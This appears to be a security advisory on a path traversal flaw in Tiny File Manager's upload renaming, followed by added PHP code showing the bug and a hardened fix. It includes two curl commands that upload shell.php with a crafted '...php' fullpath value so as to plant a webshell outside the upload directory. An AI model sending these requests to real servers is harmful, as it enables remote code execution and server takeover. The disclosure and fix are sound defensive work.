A Path Traversal vulnerability exists in Tiny File Manager that allows files to be uploaded to an arbitrary location on the server. The flaw derives from the way file upload/creation is handled when a file with the same name already exists in the target directory.
// tinyfilemanager.php
// ... snippet ...
if(file_exists ($fullPath) && !$override_file_name) {
    $ext_1 = $ext ? '.'.$ext : '';
    $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...
If we look at how str_replace is used to separate the old filename from its extension, we can see that it in fact removes every occurrence of the extension from the whole fullpath parameter, so stripping .php turns every ...php path segment into a parent-directory reference (..). Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php and filename shell.php, it will move the uploaded file to ../../../../../var/www/html/benign_<DATE>.php.
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
By leveraging this vulnerability to upload a webshell, it’s possible to achieve RCE on the server/container.
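
The str_replace behaviour described above, next to one way to harden it, as an added example (not code from Tiny File Manager or from the original advisory). The function names, the upload root /var/www/html/uploads, the fixed timestamp and the assumption that the fullpath value is appended to the upload root are all illustrative.

```php
<?php
// Added illustration; names, upload root and timestamp are assumptions.

// The page's logic: strips EVERY occurrence of the extension from the whole path.
function vulnerable_rename(string $fullPath, string $ext, string $stamp): string {
    $ext_1 = $ext ? '.' . $ext : '';
    return str_replace($ext_1, '', $fullPath) . '_' . $stamp . $ext_1;
}

// Hardened: only the final path component is split into name and extension.
function safe_rename(string $fullPath, string $stamp): string {
    $p   = pathinfo($fullPath);
    $ext = isset($p['extension']) ? '.' . $p['extension'] : '';
    return $p['dirname'] . '/' . $p['filename'] . '_' . $stamp . $ext;
}

// Resolve "." and ".." lexically; no filesystem access, the target may not exist yet.
function normalize_path(string $path): string {
    $out = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') { continue; }
        if ($seg === '..') { array_pop($out); continue; }
        $out[] = $seg;
    }
    return '/' . implode('/', $out);
}

// Defence in depth: reject any final path that resolves outside the upload root.
function is_within_root(string $root, string $path): bool {
    $r = rtrim(normalize_path($root), '/') . '/';
    return strncmp(normalize_path($path) . '/', $r, strlen($r)) === 0;
}

$root  = '/var/www/html/uploads';   // assumed upload root
$stamp = '240101120000';            // constructed; stands in for date('ymdHis')
// fullpath value taken from the page, appended to the assumed root
$input = $root . '/...php/...php/...php/...php/...php/var/www/html/benign.php';

$cases = [
    'vulnerable' => vulnerable_rename($input, 'php', $stamp),
    'hardened'   => safe_rename($input, $stamp),
];
foreach ($cases as $label => $path) {
    printf("%-10s %s\n  resolves to %s (%s)\n", $label, $path, normalize_path($path),
        is_within_root($root, $path) ? 'inside root' : 'OUTSIDE root, reject');
}
```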